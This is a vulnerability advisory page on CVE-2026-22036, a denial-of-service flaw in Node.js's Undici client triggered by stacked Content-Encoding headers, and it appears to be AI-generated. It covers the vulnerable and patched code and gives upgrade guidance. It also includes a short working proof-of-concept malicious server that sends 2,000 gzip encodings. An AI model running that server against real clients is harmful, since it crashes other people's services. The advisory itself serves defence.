CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-22036
5.90.02%

Suffocating Node.js: The Undici Decompression DoS (CVE-2026-22036)

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 19, 2026·5 min read·12 visits

PoC Available

Executive Summary (TL;DR)

Undici didn't limit the number of 'Content-Encoding' layers in a response. An attacker can send 'gzip, gzip, gzip...' 2,000 times, causing the client to build 2,000 stream objects, leading to a crash.

Node.js's high-performance HTTP client, Undici, contains a critical oversight in how it handles stacked compression schemes. By responding with a maliciously crafted 'Content-Encoding' header, an attacker can force the client to allocate thousands of decompression streams instantly. This results in a resource exhaustion loop that spikes CPU usage and drains memory, effectively killing the Node.js process.

The Hook: Meet the New Boss

If you've been using Node.js recently, you've likely touched Undici without even knowing it. It's the engine under the hood of the global fetch() implementation introduced in Node 18. It was built for speed—stripping away the bloat of the legacy http module to give developers raw performance.

But here's the thing about performance-obsessed code: sometimes it assumes the other side of the connection is playing nice. Undici trusts the server to tell it how to decode the incoming data. If the server says, "Hey, this payload is gzipped," Undici spins up a zlib stream to handle it.

Now, ask yourself: What happens if the server is a sociopath? What if it says, "This data is gzipped... and then gzipped again... and again..." for about three thousand layers? Before CVE-2026-22036, Undici would look at that request, nod enthusiastically, and try to build a decompression pipeline that reaches the moon.

The Flaw: Infinite Matryoshka Dolls

The vulnerability lies in the DecompressHandler. The HTTP specification (RFC 7231) allows for multiple content encodings. This is useful if you want to compress a file and then encrypt it, or apply a legacy compression followed by a modern one. The header looks like this:

Content-Encoding: gzip, br

The receiving client is supposed to peel these layers back one by one. Undici implemented this by splitting the header string by commas and iterating over the result. For every token it found, it instantiated a new transform stream and piped them together.

The fatal flaw? No speed limit.

There was absolutely no check on how many encodings were listed. If a malicious server sent a header with 5,000 gzip tokens, Undici's loop would dutifully create 5,000 heavy zlib objects. This isn't just a logic error; it's an invitation for a resource exhaustion attack. It's like ordering a single coffee but specifying 10,000 pumps of vanilla syrup—the barista (your CPU) is going to have a breakdown trying to fulfill the order.

The Code: The Smoking Gun

Let's look at the crime scene. The vulnerable code in lib/interceptor/decompress.js was deceptively simple. It took the header, split it, and mapped it to streams.

// Vulnerable Implementation
#createDecompressionChain (encodings) {
  const parts = encodings.split(',') 
  // ⚠️ DANGER: No check on parts.length!
  const decompressors = parts.map(encoding => this.#getDecompressor(encoding))
  // ... piping logic ...
}

It’s clean code, but it’s naive. It assumes parts will be a reasonable number, like 1 or 2.

The fix, applied in commit b04e3cb, introduces a hard reality check. It aligns Undici with other hardened clients like curl by imposing a strict limit.

// Patched Implementation
#createDecompressionChain (encodings) {
  const parts = encodings.split(',')
 
  // The sanity check we were missing
  const maxContentEncodings = 5
  if (parts.length > maxContentEncodings) {
    throw new Error(`too many content-encodings: ${parts.length}`)
  }
  // ...
}

If you try to pass more than 5 layers now, Undici throws an error before allocating a single byte of memory for streams. Attack neutralized.

The Exploit: Death by a Thousand Gzips

Exploiting this is trivially easy if you control the server (or can perform a Man-in-the-Middle attack). You don't even need to send a massive body; the header processing alone is enough to degrade the target.

Here is a conceptual Proof of Concept (PoC) for a malicious Node.js server designed to kill a vulnerable Undici client:

const http = require('http');
 
const server = http.createServer((req, res) => {
  // Create a string of "gzip, " repeated 2000 times
  const abuse = Array(2000).fill('gzip').join(', ');
  
  res.writeHead(200, {
    'Content-Type': 'text/plain',
    'Content-Encoding': abuse // The payload
  });
  
  res.end('Goodbye memory.');
});
 
server.listen(1337);

When a vulnerable client calls fetch('http://malicious-server:1337'), it parses that header. The DecompressHandler immediately attempts to construct 2,000 stream instances.

In Node.js, streams are expensive. They allocate buffers and bind event listeners. Doing this thousands of times synchronously blocks the event loop. The CPU spikes to 100%, and the Garbage Collector goes into a panic spiral trying to manage the sudden allocation frenzy. For a single-threaded runtime like Node, this is game over.

The Fix: Stopping the Bleeding

This isn't a vulnerability you can easily "configure" away without touching the code, because the flaw is in the library's core logic. The only real path forward is upgrading.

If you use Undici directly: Update to version 6.23.0 or 7.18.0. These versions include the hard limit of 5 encodings.

If you use Node.js fetch: You are at the mercy of the Node.js release cycle. You need to update your Node.js runtime to a version that bundles the patched Undici. Check the release notes for your Node version to ensure it includes the relevant Undici security update.

Workaround (The Band-Aid): If you cannot update immediately and are sitting behind a reverse proxy (like Nginx or AWS WAF), you can try to inspect the Content-Encoding header of incoming responses from upstream services (if your Node app is acting as a proxy) or limit the header size. However, since this exploits the client (your app making outgoing requests), network-level mitigation is harder unless you proxy all your outgoing traffic through a smart gateway that sanitizes response headers.

Official Patches

Node.jsCommit limiting content-encoding depth

Fix Analysis (1)

Technical Appendix

CVSS Score
5.9/ 10
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Probability
0.02%
Top 95% most exploited

Affected Systems

Node.js Applications using `fetch()`Applications using `undici` package < 6.23.0Applications using `undici` package >= 7.0.0 < 7.18.0

Affected Versions Detail

Product
Affected Versions
Fixed Version
undici
Node.js
< 6.23.06.23.0
undici
Node.js
>= 7.0.0 < 7.18.07.18.0
AttributeDetail
CWE IDCWE-770
Attack VectorNetwork
CVSS5.9 (Medium)
ImpactDenial of Service
Exploit MaturityPoC Available
Fix ComplexityLow (Update)

MITRE ATT&CK Mapping

T1499Endpoint Denial of Service
Impact
CWE-770
Allocation of Resources Without Limits or Throttling

Allocation of Resources Without Limits or Throttling

Known Exploits & Detection

GitHub AdvisoryAdvisory containing technical description and regression test case

Vulnerability Timeline

Fix committed by Matteo Collina
2026-01-06
CVE Published / Patch Released
2026-01-14
NVD Analysis Updated
2026-01-22

References & Sources

  • [1]GHSA-g9mf-h72j-4rw9
  • [2]NVD Entry for CVE-2026-22036

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.